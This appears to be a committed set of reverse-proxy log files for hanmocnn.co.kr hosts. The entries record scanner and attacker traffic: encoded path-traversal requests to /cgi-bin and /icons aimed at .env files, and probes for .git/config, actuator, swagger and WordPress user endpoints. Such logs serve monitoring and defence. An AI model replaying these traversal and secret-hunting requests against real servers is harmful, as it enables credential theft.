2026/02/15 00:18:32 [warn] 383#383: *343 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1"
|
||||||
|
2026/02/15 00:18:33 [warn] 376#376: *347 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1"
|
||||||
|
2026/02/15 00:18:34 [warn] 376#376: *352 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/15 00:18:35 [warn] 376#376: *356 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
|
||||||
|
2026/02/15 00:18:55 [warn] 382#382: *337 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/15 00:18:57 [warn] 376#376: *436 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
|
||||||
|
2026/02/15 00:18:59 [warn] 376#376: *440 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/app/.env HTTP/1.1"
|
||||||
|
2026/02/15 00:19:01 [warn] 376#376: *444 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/home/www/.env HTTP/1.1"
|
||||||
|
2026/02/15 00:19:14 [warn] 376#376: *408 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/html/.env HTTP/1.1"
|
||||||
|
2026/02/15 00:19:21 [warn] 376#376: *472 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/.env HTTP/1.1"
|
||||||
|
2026/02/15 00:19:22 [warn] 376#376: *474 using uninitialized "server" variable while logging request, client: 185.177.72.60, server: asset.hanmocnn.co.kr, request: "GET /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/var/www/html/.env HTTP/1.1"
|
||||||
|
2026/02/15 00:34:33 [warn] 377#377: *564 using uninitialized "server" variable while logging request, client: 81.29.142.6, server: asset.hanmocnn.co.kr, request: "GET / HTTP/1.1", host: "asset.hanmocnn.co.kr"
|
||||||
|
2026/02/15 01:55:47 [warn] 506#506: *3933 using uninitialized "server" variable while logging request, client: 2.58.56.62, server: asset.hanmocnn.co.kr
|
||||||
431
npm/data/logs/proxy-host-3_access.log
Normal file
431
npm/data/logs/proxy-host-3_access.log
Normal file
@@ -0,0 +1,431 @@
|
|||||||
|
[14/Feb/2026:23:32:51 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/3102295512641" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "curl/8.12.1" "-"
|
||||||
|
[14/Feb/2026:23:33:00 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4VHMEtLEK5TC8YWnZ3lPRnOmKMu-QLNe0Pks3kq7YKI" [Client 23.178.112.212] [Length 87] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:33:01 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4VHMEtLEK5TC8YWnZ3lPRnOmKMu-QLNe0Pks3kq7YKI" [Client 13.215.209.28] [Length 87] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:33:02 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4VHMEtLEK5TC8YWnZ3lPRnOmKMu-QLNe0Pks3kq7YKI" [Client 34.220.255.182] [Length 87] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:33:02 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4VHMEtLEK5TC8YWnZ3lPRnOmKMu-QLNe0Pks3kq7YKI" [Client 13.51.200.205] [Length 87] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:33:03 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/.well-known/acme-challenge/4VHMEtLEK5TC8YWnZ3lPRnOmKMu-QLNe0Pks3kq7YKI" [Client 3.144.114.8] [Length 87] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:33:47 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/" [Client 143.110.213.72] [Length 39176] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:48 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/server" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:49 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/server-status" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:51 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/about" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:52 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/login.action" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:53 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/v2/_catalog" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:53 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.DS_Store" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:54 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.env" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:56 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:58 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.git/config" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:33:59 +0000] - 404 404 - POST http mail.hanmocnn.co.kr "/graphql" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:00 +0000] - 301 301 - POST http mail.hanmocnn.co.kr "/api" [Client 143.110.213.72] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:00 +0000] - 404 404 - POST http mail.hanmocnn.co.kr "/api/graphql" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:01 +0000] - 404 404 - POST http mail.hanmocnn.co.kr "/graphql/api" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:01 +0000] - 404 404 - POST http mail.hanmocnn.co.kr "/api/gql" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:01 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:02 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/config.json" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:04 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/telescope/requests" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:05 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/info.php" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:06 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.well-known/security.txt" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:07 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/actuator/env" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:09 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/swagger-ui.html" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:10 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/swagger/index.html" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:11 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:12 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:13 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/swagger.json" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:14 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:15 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/v2/api-docs" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:16 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/v3/api-docs" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:17 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/api-docs/swagger.json" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:18 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/api/swagger.json" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:19 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/@vite/env" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:20 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/.vscode/sftp.json" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:21 +0000] - 405 405 - OPTIONS http mail.hanmocnn.co.kr "/" [Client 143.110.213.72] [Length 150] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:22 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 143.110.213.72] [Length 10778] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:34:23 +0000] - 404 404 - GET http mail.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 143.110.213.72] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[14/Feb/2026:23:35:45 +0000] - 200 200 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:35:45 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 39183] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:35:48 +0000] - 404 404 - HEAD http mail.hanmocnn.co.kr "/_next" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:36:04 +0000] - 200 200 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:36:04 +0000] - 200 200 - GET http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 39176] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:36:48 +0000] - - 301 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:36:50 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/" [Client 222.117.41.51] [Length 2544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[14/Feb/2026:23:36:50 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/rc/skins/elastic/images/favicon.ico?s=1748763912" [Client 222.117.41.51] [Length 1691] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://mail.hanmocnn.co.kr/"
|
||||||
|
[14/Feb/2026:23:37:00 +0000] - - 301 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:39:18 +0000] - - 301 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:39:28 +0000] - - 301 - HEAD http mail.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[14/Feb/2026:23:40:11 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 185.177.72.60] [Length 10723] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:14 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js" [Client 185.177.72.60] [Length 262106] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:15 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js.map" [Client 185.177.72.60] [Length 31] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:16 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/index.html" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:16 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/checkout" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:16 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/robots.txt" [Client 185.177.72.60] [Length 26] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:16 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/sitemap.xml" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:17 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:17 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/api/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:17 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.vite" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:17 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/backend/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:18 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/laravel/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:18 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/payment/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:18 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/" [Client 185.177.72.60] [Length 10724] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:18 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/admin/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:19 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.example" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:19 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/core/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:19 +0000] - 200 200 - GET https mail.hanmocnn.co.kr "/cache/97de29030b01af5b720989e26703fcf354efbcf2.js" [Client 185.177.72.60] [Length 262106] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:19 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:19 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/stripe/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:20 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.production" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:20 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.bak" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:20 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/.env.local" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:20 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/assets/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/app/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/config.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/docker/.env" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:21 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/config.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/main.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/env.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:22 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/app.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/constants.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
[14/Feb/2026:23:40:23 +0000] - 404 404 - GET https mail.hanmocnn.co.kr "/bundle.js" [Client 185.177.72.60] [Length 118] [Gzip 1.36] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-"
|
||||||
|
